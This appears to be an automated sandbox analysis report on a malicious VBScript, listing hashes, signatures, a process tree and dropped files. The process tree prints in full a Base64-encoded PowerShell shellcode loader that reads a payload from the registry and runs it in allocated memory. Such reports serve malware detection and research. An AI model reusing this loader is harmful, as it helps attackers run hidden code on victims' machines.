ca51d108260a5dfd9ae4c02d3302ae91ebdfdad91ab75b4228371ace04290abf

General

Target

Hvilested.vbs
Size

135KB
MD5

36b1f36ea9b9752a8af52202daeebfd3
SHA1

a3e4e48fe2c1897930dce07e758e1e590a00d2ad
SHA256

8b4d69556cd93e5b27c7fdc3a7e765fcb6f45ebd8451ee4e9fa9a515aac6811d
SHA512

d3172ec500241d744319495b585d558ffd625f767f333d1751b1fa6fa25401db8253bd97892a91e994cffbad0df1925f0f6abdb7bb61fff0b1b2cd6ed59da466
SSDEEP

1536:TjeOZx8kZRMuKPheRTHNo2rNo8EgnxTwBII9zLKFisRxcyeC2X2qCLmob8OVPeVv:TKwtAWTBRnxTbvcoU0L78OVGvUc

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2012 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2012 powershell.exe

pid	process
2012	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2012	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WScript.exepowershell.execsc.exe

description	pid	process	target process
PID 696 wrote to memory of 2012	696	WScript.exe	powershell.exe
PID 696 wrote to memory of 2012	696	WScript.exe	powershell.exe
PID 696 wrote to memory of 2012	696	WScript.exe	powershell.exe
PID 696 wrote to memory of 2012	696	WScript.exe	powershell.exe
PID 2012 wrote to memory of 1312	2012	powershell.exe	csc.exe
PID 2012 wrote to memory of 1312	2012	powershell.exe	csc.exe
PID 2012 wrote to memory of 1312	2012	powershell.exe	csc.exe
PID 2012 wrote to memory of 1312	2012	powershell.exe	csc.exe
PID 1312 wrote to memory of 1336	1312	csc.exe	cvtres.exe
PID 1312 wrote to memory of 1336	1312	csc.exe	cvtres.exe
PID 1312 wrote to memory of 1336	1312	csc.exe	cvtres.exe
PID 1312 wrote to memory of 1336	1312	csc.exe	cvtres.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Hvilested.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBCAEUARwBJAFYAIABBAGYAcwBhAGEAYgBsAGEAbgBrADkAIABrAG8AbgBuAGUAawBzAGkAIABSAEUARQBWAE8ASwBFAFMAUwBIACAAUwBLAFUATQAgAHMAcABvAG8AbgBoACAAYgByAGQAcgAgAGEAbgB0AGkAZgBvAHIAZQBpACAARgBpAGoAaQA2ACAAbwB1AHQAYwBoAGEAcgBtACAAcQB1AGEAcgB0AGUAcgAgAEYAZQByAHQAaQAgAEoAbwByAGQAcwBwAGUAawAyACAAQgByAG8AbgB6AGkANgAgAEQAQQBUAEEAQgAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8ANQAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA2ACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvADcALABpAG4AdAAgAHAAbwBtAG0AZQByAHAAZQBsAG8AOAAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFMAbABlAGUAcAAoAHUAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADAALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4AMQAsAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgAyACwAaQBuAHQAIABOAE8ATgBTAEEATgBHAFUASQBOADMALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABwAG8AbQBtAGUAcgBwAGUAbABvADEALAByAGUAZgAgAEkAbgB0ADMAMgAgAHAAbwBtAG0AZQByAHAAZQBsAG8AMgAsAGkAbgB0ACAAcABvAG0AbQBlAHIAcABlAGwAbwAzACkAOwAJAA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFoAdwBBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATgBPAE4AUwBBAE4ARwBVAEkATgA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABGAHIAcwB0AGUAbQBhAG4AZABzACwAaQBuAHQAIABwAG8AbQBtAGUAcgBwAGUAbABvACwAcgBlAGYAIABJAG4AdAAzADIAIABOAE8ATgBTAEEATgBHAFUASQBOACwAaQBuAHQAIABQAGUAcgBzADEALABpAG4AdAAgAE4ATwBOAFMAQQBOAEcAVQBJAE4ANwApADsADQAKAA0ACgB9AA0ACgAiAEAADQAKACMAZgBsAG8AcwBrAHUAbAAgAHAAYQBjAGUAbQAgAFMAdAByAGsAYgA0ACAARABFAEYAQQBDACAAUwB1AHAAcgBhADUAIABkAGUAbgBvAHQAYQB0AGkAIAB0AHYAYQBuAGcAcwBmAGoAZQAgAEUAcgBpAGMAYQBzAHAAbwAgAHMAbgBlAGIAcgBzACAAVQBkAHMAawB5AGQAbgBpAG4AZwA1ACAAUgBlAGEAcwBvACAAQQBsAGIAaQBuAGkAcwBtADEAIABpAG4AZgBhAGwAbABpAGIAIABDAGgAYQBtAHAAYQBnAG4AZQAgAFIAdQBzAHMAZQByACAAUwBFAE4ATgBJAEcASABUAFMAIABHAGEAbABsAGkAYwBtAGUAdAA1ACAARAB2AHIAZwBwAGkAbABlADUAIAB2AGkAbgBkAHIAdQBlACAATQBhAGcAaQBzAHQAIABuAG8AbgByACAAcgBpAGEAbABpAG4AZAAgAFMAVABVAE4ATgBJAE4ARwAgAEwAYQBhAG4AZQBmAG8AbgBkAGUAIABGAE8AUwBUAEUAUgBIAE8ATwAgAFYASQBPAEwAQQBTAFQAQQBOAEUAIAAgAA0ACgAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwA9ADAAOwANAAoAJABOAE8ATgBTAEEATgBHAFUASQBOADkAPQAxADAANAA4ADUANwA2ADsADQAKACQATgBPAE4AUwBBAE4ARwBVAEkATgA4AD0AWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAWgB3AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgALQAxACwAWwByAGUAZgBdACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACwAMAAsAFsAcgBlAGYAXQAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwARgBPAFIASwAiACkALgBOAFUAQwBMAEUAQQBUAA0ACgANAAoAJABTAFYAVQBMAE0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAQQBmAGcAcgBmAHQAZQBkAGUAbgA0AC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAFMAVgBVAEwATQBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAEEAZgBnAHIAZgB0AGUAZABlAG4ANAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAFQAZQBsAGUAcwBrAHIAaQA9ADAAOwAgACQAVABlAGwAZQBzAGsAcgBpACAALQBsAHQAIAAkAFMAVgBVAEwATQAuAGMAbwB1AG4AdAAgADsAIAAkAFQAZQBsAGUAcwBrAHIAaQArACsAKQANAAoAewANAAoACQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoACQATgBPAE4AUwBBAE4ARwBVAEkATgAzACsAJABUAGUAbABlAHMAawByAGkALABbAHIAZQBmAF0AJABTAFYAVQBMAE0AWwAkAFQAZQBsAGUAcwBrAHIAaQBdACwAMQApAA0ACgANAAoAfQANAAoAWwBOAE8ATgBTAEEATgBHAFUASQBOADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAE4ATwBOAFMAQQBOAEcAVQBJAE4AMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\feziotop.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3D7F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3D6F.tmp"
4⤵
PID:1336

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES3D7F.tmp

Filesize
1KB

MD5
e33eebb64c17236839769b3622b9038b

SHA1
53bb636e1f08bbdffb6cf67af9383b0f55883ab3

SHA256
aae0dc64962051ecc7e852df6fc1d0346d090d8d6ab3ee81ab361f1432256752

SHA512
86a928d3f867b0409999fcc5615cff50d0f899b284eb69be9ba535f777fa83f72b71990ac92b7f68cbbfaf39e39a27509356b4df637becb9066d6e76946c7a17

Download Submit
C:\Users\Admin\AppData\Local\Temp\feziotop.dll

Filesize
3KB

MD5
1b5c0ad652cb6568baf820f6432f5796

SHA1
170b5fe5edac5ffb07fe7a80f50016efcb27596f

SHA256
0207821f372e8e4cc06dd13765308fc81c3fb1472c234551626268e1d4de2aac

SHA512
8a9786c078e3e5d82af5b273ec6048151bed49d7a151bb0c69942266424619b560b45825a2c9db762cbb706faf098ffd45f4234ff2255bcab4e7e3987698410d

Download Submit
C:\Users\Admin\AppData\Local\Temp\feziotop.pdb

Filesize
7KB

MD5
7814ddf4a6685cfea9655600cfc5d102

SHA1
9125475806a68fcc653ef15629c76f6077de0d7b

SHA256
d91d0a74028a4fe102848076e08aa236a4de520256a3d4d6e014c1aaadd9ddc2

SHA512
d53e70255809aa703f963049706a8b9ca1ecbacbd23413d2c01e5935fc66767e34d4701fe1cb68c159f036abe1caebc06831754ce5f4fd75cab6b8f718bd09b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC3D6F.tmp

Filesize
652B

MD5
04d010a39fc29a105e2a46ed06147bf0

SHA1
37b2fbbeabd0fb2d711be214bbce57659105ab71

SHA256
71990fcb58c9dd52fa599a8590d1aedba6396784d44b9a2ec86c123c34cc8488

SHA512
1f11eb5546cbb81490d96fb90d69c5edd95694a92bdaabecc3bf9d40593751603215917cf4c877ea4156ac7e0e4cd3ba813af56db7b7568adceb5002be30b9cb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\feziotop.0.cs

Filesize
695B

MD5
064a6660e679021cfee85dc594d08ce8

SHA1
7c10b7ef48bbb535100943dc90b6aeeaa59e428a

SHA256
6ff92c6c4cb841339ce2b5ca496dcafb35f345eca6d401abf3c081bf5f74757b

SHA512
152654d72902a5d50469d57ec4fb80a2494f402665956503c7864d52ac140300ff01e66ffe653db9bfe7955377875f25e9d90c4809c5c188002ad08685764162

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\feziotop.cmdline

Filesize
309B

MD5
1b14182fd7b6ca376b17c44fc807b39d

SHA1
19b2681a62160581ddcdd0630f1ae0e8e7543b53

SHA256
59febcff87ec540c1c40ea78568d54d4642be3a373077fdffeefd4dae1796169

SHA512
4851eeeb1b446c705178ca5ad47dcbdf451512c9260ce9d0c12a303c60e1c0f95cf22e9fbb67ff9d5401c1c42bd000ba2ea734329c4617b83dbceb3b19d27e8d

Download Submit
memory/696-54-0x000007FEFBE41000-0x000007FEFBE43000-memory.dmp

Filesize
8KB

Download
memory/1312-57-0x0000000000000000-mapping.dmp

Download
memory/1336-60-0x0000000000000000-mapping.dmp

Download
memory/2012-63-0x0000000073E90000-0x000000007443B000-memory.dmp

Filesize
5.7MB

Download
memory/2012-56-0x00000000764D1000-0x00000000764D3000-memory.dmp

Filesize
8KB

Download
memory/2012-55-0x0000000000000000-mapping.dmp

Download
memory/2012-66-0x0000000005A10000-0x0000000005B10000-memory.dmp

Filesize
1024KB

Download
memory/2012-67-0x0000000073E90000-0x000000007443B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing